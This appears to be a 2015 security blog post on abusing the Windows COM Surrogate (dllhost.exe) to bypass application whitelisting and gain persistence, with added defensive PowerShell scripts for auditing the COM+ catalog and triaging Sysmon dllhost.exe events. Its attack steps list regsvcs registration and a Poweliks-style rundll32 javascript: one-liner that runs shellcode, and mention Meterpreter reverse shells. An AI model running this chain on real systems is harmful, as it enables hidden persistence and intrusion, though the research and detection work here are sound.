Thursday, August 27, 2015

Hiding In Plain Sight - COM Surrogate Application Whitelisting Bypass & Persistence


What exactly are all those Dllhost.exe processes, and what are they doing?

The best description I have found of what is happening here:

"The dllhost.exe process goes by the name COM Surrogate ... What is this COM Surrogate...?
The COM Surrogate is a fancy name for Sacrificial process for a COM object that is run outside of the process that requested it. Explorer uses the COM Surrogate when extracting thumbnails, for example. If you go to a folder with thumbnails enabled, Explorer will fire off a COM Surrogate and use it to compute the thumbnails for the documents in the folder. It does this because Explorer has learned not to trust thumbnail extractors; they have a poor track record for stability. Explorer has decided to absorb the performance penalty in exchange for the improved reliability resulting in moving these dodgy bits of code out of the main Explorer process. When the thumbnail extractor crashes, the crash destroys the COM Surrogate process instead of Explorer.
In other words, the COM Surrogate is the I don't feel good about this code, so I'm going to ask COM to host it in another process. That way, if it crashes, it's the COM Surrogate sacrificial process that crashes instead of me process. And when it crashes, it just means that Explorer's worst fears were realized."

Again, Dllhost is a trusted, signed binary that executes other binaries. So it is a candidate for whitelisting bypass, with the added bonus of being a persistence mechanism.

I wrote a Proof Of Concept here: [Updated]

Basically, this is just going to execute some shellcode once we register the COM+ Application.

1. [.NET SDK]          sn.exe -k key.snk
   (generates the strong-name key pair; regsvcs will only register a strong-named assembly)

2. [csc]               C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /keyfile:key.snk /target:library /out:dllguest.dll dllguest.cs

3. [As Administrator]  C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe dllguest.dll

4. [From PowerShell]   $b = New-Object -ComObject dllguest.bypass

   [From VBScript]     Dim obj
                       Set obj = CreateObject("dllguest.Bypass")

5. [JScript]           var o = new ActiveXObject("dllguest.Bypass");

6. [Poweliks-like]     rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=new%20ActiveXObject("dllguest.Bypass");

Here is one place you can find the registered COM+ application:

It does require admin rights to install the COM+ Application, and all this example does is execute shellcode. Feel free to explore other aspects of COM Surrogate persistence; there is quite a bit more here.
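Because the registration needs admin rights and leaves an entry in the COM+ catalog, the defender's counterpart to the steps above is to inventory that catalog. The following is an example I added for this page, not code from the post or its author. It assumes an elevated PowerShell session on Windows and that the COMAdmin.COMAdminCatalog object is present (it ships with Component Services); every other name is the script's own.

```powershell
# Added example (not the post author's code): inventory every COM+ application
# in the catalog together with the components it hosts, so an application
# registered with regsvcs the way the post describes stands out.
# Assumptions: elevated PowerShell on Windows; COMAdmin.COMAdminCatalog present.
$catalog = New-Object -ComObject COMAdmin.COMAdminCatalog
$apps = $catalog.GetCollection('Applications')
$apps.Populate()

$inventory = foreach ($app in $apps) {
    # $app.Key is the application ID; for a server application it is the GUID
    # that its surrogate shows on the command line as dllhost.exe /Processid:{...}
    $components = $apps.GetCollection('Components', $app.Key)
    $components.Populate()

    foreach ($comp in $components) {
        $clsid = $comp.Value('CLSID')
        $dll   = $comp.Value('DLL')

        # A managed component registered by regsvcs reports mscoree.dll as its DLL;
        # the real assembly location is the CodeBase value under the CLSID's
        # InprocServer32 key, so prefer that when it exists.
        $inproc = Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32" -ErrorAction SilentlyContinue
        $module = if ($inproc -and $inproc.CodeBase) { $inproc.CodeBase } else { $dll }

        [pscustomobject]@{
            Application    = $app.Name
            AppID          = $app.Key
            Activation     = if ($app.Value('Activation') -eq 1) { 'Server (dllhost.exe)' } else { 'Library (in caller)' }
            Component      = $comp.Name
            ProgID         = $comp.Value('ProgID')
            CLSID          = $clsid
            Module         = $module
            # First-pass heuristic: code hosted from outside the Windows directory
            # deserves a closer look. A triage hint, not a verdict.
            OutsideWindows = ($module -notmatch '[\\/]Windows[\\/]')
        }
    }
}

$inventory | Sort-Object OutsideWindows -Descending, Application |
    Format-Table Application, Activation, ProgID, Module, OutsideWindows -AutoSize -Wrap
```

Run it once on a freshly built reference machine and keep the output; any application or ProgID that appears later on a production host and is missing from that baseline is worth explaining. The AppID column is the value to carry over to Sysmon, since it is what a server application's dllhost.exe instance puts on its command line.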

When was the last time you checked your workstation for a COM+ Application? Furthermore, if the target system is running a tool like Sysmon, they will see TONS of entries for dllhost.exe. They look like this:

So there you go.  Blend in with the noise, bypass all the things.  Camouflage is a way for hunters to blend in with the terrain.  Dllhost.exe certainly helps you blend in with the system noise.
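The noise is real, but most legitimate dllhost.exe launches carry a /Processid:{AppID} for an application that was already on the box when it was built. The following is an example I added for this page, not code from the post or its author. It assumes Sysmon is installed and logging process creation (Event ID 1), and that $knownAppIds has been filled from a clean reference build; the two GUID strings are placeholders, and $scriptHosts is my own list.

```powershell
# Added example (not the post author's code): triage Sysmon process-creation
# events for dllhost.exe so the few that matter stand out from the routine noise.
# Assumptions: Sysmon logs Event ID 1; $knownAppIds comes from a clean reference
# build of the same image (the two values below are placeholders).
$knownAppIds = @(
    '{PLACEHOLDER-KNOWN-GOOD-APPID-1}',
    '{PLACEHOLDER-KNOWN-GOOD-APPID-2}'
)
$scriptHosts = 'powershell.exe', 'wscript.exe', 'cscript.exe', 'rundll32.exe', 'mshta.exe'

$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'
    Id      = 1
} -ErrorAction Stop

$hits = foreach ($evt in $events) {
    # Flatten the EventData name/value pairs into a hashtable.
    $xml  = [xml]$evt.ToXml()
    $data = @{}
    foreach ($field in $xml.Event.EventData.Data) { $data[$field.Name] = $field.'#text' }
    if ($data.Image -notlike '*\dllhost.exe') { continue }

    # A surrogate launched for a COM+ server application carries that
    # application's AppID on the command line.
    $appId  = if ($data.CommandLine -match '/Processid:(\{[0-9A-Fa-f-]{36}\})') { $Matches[1].ToUpper() } else { $null }
    $parent = Split-Path -Leaf $data.ParentImage

    $reasons = @()
    if (-not $appId) {
        $reasons += 'no /Processid argument'
    } elseif ($knownAppIds -notcontains $appId) {
        # Resolve the AppID to its registered name so the analyst sees what it hosts.
        $name = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\AppID\$appId" -ErrorAction SilentlyContinue).'(default)'
        $reasons += "AppID not in baseline ($(if ($name) { $name } else { 'unnamed' }))"
    }
    if ($parent -in $scriptHosts) { $reasons += "parent is $parent" }

    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Time    = $evt.TimeCreated
            AppID   = $appId
            Parent  = $parent
            Command = $data.CommandLine
            Why     = $reasons -join '; '
        }
    }
}

$hits | Sort-Object Time | Format-Table -AutoSize -Wrap
```

One caveat on the parent check: an out-of-process COM+ server activated from a script is started by the DCOM launcher, so dllhost.exe's parent is normally svchost.exe rather than the script host. That is exactly why a surrogate blends in, and why the AppID comparison against a clean baseline, paired with the catalog inventory above, is the signal to rely on rather than process ancestry.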

This works brilliantly with a Meterpreter Reverse Shell.

So there you go.  Until next time



1 comment:

  1. Nice blog and very informative, thank you for sharing with us.